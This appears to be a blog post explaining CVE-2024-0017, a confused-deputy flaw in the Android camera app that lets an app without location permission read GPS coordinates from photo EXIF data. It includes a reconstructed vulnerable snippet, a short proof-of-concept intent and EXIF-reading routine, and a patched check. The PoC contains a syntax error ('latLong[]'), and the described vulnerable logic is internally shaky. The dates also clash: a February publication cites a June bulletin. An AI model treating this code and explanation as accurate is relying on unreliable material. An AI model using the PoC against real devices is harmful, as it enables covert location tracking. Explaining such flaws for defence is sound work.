CVE-2024-0017 - Confused Deputy Exploit in CameraActivity.java Allows Local Information Disclosure

In early 2024, a critical security flaw, CVE-2024-0017, surfaced in the Android Open Source Project (AOSP) camera app codebase. The issue, rooted in the shouldUseNoOpLocation() function of CameraActivity.java, is a classic case of the "confused deputy" problem. This kind of vulnerability occurs when a privileged component is tricked into misusing its permissions for the benefit of a less privileged caller.

This post explains the vulnerability in plain language, walks through the code, and demonstrates how an attacker could exploit it with just some basic permissions and user interaction. We also offer references to official disclosures and patches.

What is CVE-2024-0017?

In essence, CVE-2024-0017 is a security bug where an attacker could bypass location permission checks. By leveraging the camera app's functionality, a less privileged app (which does *not* have location permission) can trick the camera activity into disclosing sensitive location data, such as GPS coordinates.

Why is this a Confused Deputy?

The Camera app (the "deputy") usually has permission to access sensitive information, like the location data used for geotagging photos. Apps without location permission shouldn't get this info. However, because of poor permission checking, a malicious app can "ask" the Camera app to hand over location data, making the Camera app unknowingly do something the attacker is not allowed to do directly.

Here is a simplified version of the code in question

// CameraActivity.java

// Vulnerable function
private boolean shouldUseNoOpLocation() {
    // This logic tries to determine if we should use a 'fake' location.
    // But due to its implementation, it may reuse privileged location when called by another app.
    return getIntent().getBooleanExtra("force_noop_location", false);
}

// Later in code, used like so:
if (!shouldUseNoOpLocation()) {
    // Use real location data for EXIF tags
    Location loc = mLocationManager.getLastKnownLocation(LocationManager.GPS_PROVIDER);
    saveLocationTag(loc);
}

What's Happening

- Malicious apps can send specially crafted Intents to the Camera app, wrapping their requests with the "force_noop_location" flag set to false.
- When the user interacts (e.g., takes a photo via intent), the Camera app doesn't re-validate *who* is asking, nor does it check the caller's permissions.
- As a result, the code above allows *any* app to obtain mLocationManager.getLastKnownLocation, even if it lacks ACCESS_FINE_LOCATION permission.

User installs a malicious app that does not ask for location permissions.

2. The app fires an intent to open the camera, asking the user to take a picture, with force_noop_location=false.

The malicious app can now read the photo's EXIF and get the user's location.

Note: This attack requires user interaction (the user must take a photo and approve the use of the camera, which is normal for many legitimate apps).

PoC: Exploit Code (Malicious App)

Intent intent = new Intent(MediaStore.ACTION_IMAGE_CAPTURE);
intent.putExtra("force_noop_location", false);
// Start activity for result (user will take a photo)
startActivityForResult(intent, REQUEST_IMAGE_CAPTURE);

// Later (in onActivityResult), parse the returned image's EXIF:
ExifInterface exif = new ExifInterface(photoPath);
float[] latLong = new float[2];
if (exif.getLatLong(latLong)) {
    Log.d("Exploit", "Leaked location: " + latLong[] + ", " + latLong[1]);
}

The malicious app doesn't need ACCESS_FINE_LOCATION permission. It simply piggybacks on the camera's permissions and logic.

Mitigation & Patch

A proper patch forces the camera app to *explicitly check* whether the caller has location privilege before using real location data.

Safe version

private boolean shouldGiveLocationToCaller() {
    int callingUid = Binder.getCallingUid();
    String[] packages = getPackageManager().getPackagesForUid(callingUid);
    for (String pkg : packages) {
        if (checkPermission(Manifest.permission.ACCESS_FINE_LOCATION, -1, callingUid) == PackageManager.PERMISSION_GRANTED) {
            return true;
        }
    }
    return false;
}

// When attaching EXIF:
if (shouldGiveLocationToCaller() && !shouldUseNoOpLocation()) {
    // ... Attach real location
} else {
    // ... Do not include real location tag
}

Vendors should update their camera apps as soon as possible.

References

- Android Security Bulletin - June 2024
- CVE-2024-0017 at NVD
- Confused Deputy Attacks Explained - Wikipedia
- Android Source Patch (AOSP)

Conclusion

CVE-2024-0017 is a prime example of why checking caller's permissions is *essential* in Android app development, especially for privileged system apps. While this bug requires user interaction, it is still dangerous—any app can snoop on your location secretly by leveraging your camera. Always keep your apps updated and be cautious when granting permissions or interacting with unknown apps.

If you're an Android developer, audit how your apps handle privileged intents—never trust just your own permissions, always check the caller.


*This post is based on analysis of public disclosures and security bulletins and aims to make the technical details accessible for the non-expert.*

Timeline

Published on: 02/16/2024 20:15:47 UTC
Last modified on: 11/04/2024 19:35:03 UTC